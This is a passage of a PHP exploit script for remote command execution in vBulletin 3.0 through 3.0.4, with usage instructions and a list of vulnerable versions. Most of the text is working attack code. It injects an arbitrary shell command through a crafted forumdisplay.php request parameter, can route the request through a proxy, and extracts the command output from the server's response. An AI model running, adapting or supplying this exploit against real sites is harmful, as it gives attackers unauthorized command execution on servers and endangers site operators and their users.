fetch_array($forumusers) == True , when you # visit the forums, it must has at least # one user show the forum. # Fourth condition: magic_quotes_gpc must be OFF # # Vulnerable Systems: # vBulletin version 3.0 up to and including version 3.0.4 # # Immune systems: # vBulletin version 3.0.5 # vBulletin version 3.0.6 # **************************************************************/ if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } if ($argv[3]){ $url = $argv[1]; $forumid = intval($argv[2]); $command = $argv[3]; } else { echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n"; echo "Usage: ".$argv[0]." [proxy]\n\n"; echo " url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n"; echo " forum id\n"; echo " command to execute on server (ex: 'ls -la')\n"; echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n"; echo "ex :\n"; echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\""; exit; } if ($argv[4]) $proxy = $argv[4]; $action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."'; $ch=curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.'/'.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $res = substr($res, strpos($res, '_START_')+7); $res = substr($res,0, strpos($res, '_END_')); echo $res; ?>